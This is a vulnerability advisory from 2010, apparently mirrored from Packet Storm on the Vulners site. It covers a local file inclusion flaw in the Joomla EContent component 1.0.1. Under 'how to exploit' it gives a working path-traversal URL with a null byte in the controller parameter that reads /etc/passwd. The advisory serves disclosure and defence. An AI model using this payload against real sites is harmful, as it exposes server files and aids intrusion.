Lucene search
K

Joomla EContent Local File Inclusion

🗓️ 02 Apr 2010 00:00:00Reported by Chip D3 Bi0sType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 21 Views

Joomla EContent Local File Inclusion vulnerability impacting version 1.0.

Code
`---------------------------------------------------------------------------------  
Joomla Component EContent Local File Inclusion  
---------------------------------------------------------------------------------  
  
Author : Chip D3 Bi0s  
Group : LatinHackTeam  
Email & msn : [email protected]  
Date : 31 March 2010  
Critical Lvl : Moderate  
Impact : Exposure of sensitive information  
Where : From Remote  
---------------------------------------------------------------------------  
  
Affected software description:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
  
Application : EContent  
version : 1.0.1  
Developer : E-Content  
website : http://www.econtentsite.com/  
License : GPL type : Non-Commercial  
Date Added : 24 March 2010  
Download : http://www.econtentsite.com/  
  
  
  
Description :  
  
If you are looking a way to add new/fresh content to your Joomla website,  
without having to write a new article everyday, then E-Content Joomla  
Component is the solution for you!  
  
As we know articles is very important for business, especially for Internet  
Marketing Business. You need to continually write unique and quality articles  
to keep the attention of visitors and search engines.  
  
E-Content allows you to automatically collect RSS feed, HTML page content items  
and have each item inserted as an Joomla article in the section and category  
you define. The content of the article will vary based on the specific page you  
select.  
  
  
--------------  
file error : components/com_econtent/econtent.php  
  
how to exploit  
  
http://127.0.0.1/index.php?option=com_econtent&controller=../../../../../../../../../../etc/passwd%00  
  
------------------------  
  
  
+++++++++++++++++++++++++++++++++++++++  
[!] Produced in South America  
+++++++++++++++++++++++++++++++++++++++  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation